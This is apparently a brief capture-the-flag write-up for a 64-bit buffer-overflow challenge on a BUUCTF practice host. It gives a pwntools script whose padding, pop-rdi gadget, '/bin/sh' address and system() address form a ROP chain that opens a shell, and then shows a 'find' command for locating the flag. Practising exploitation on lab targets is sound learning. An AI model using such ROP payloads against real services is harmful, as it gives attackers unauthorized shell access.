Because the 64-bit parameter is stored in the register, the binsh string should be placed in the rdi register
from pwn import*
p = remote("node3.buuoj.cn",28711)
rdi=0x400683
sys=0x4005e3
bin=0x601048
payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys)
p.sendline(payload)
Flag is not in the root directory, we need to find it, use find -name flag to find it
find -name "flag"
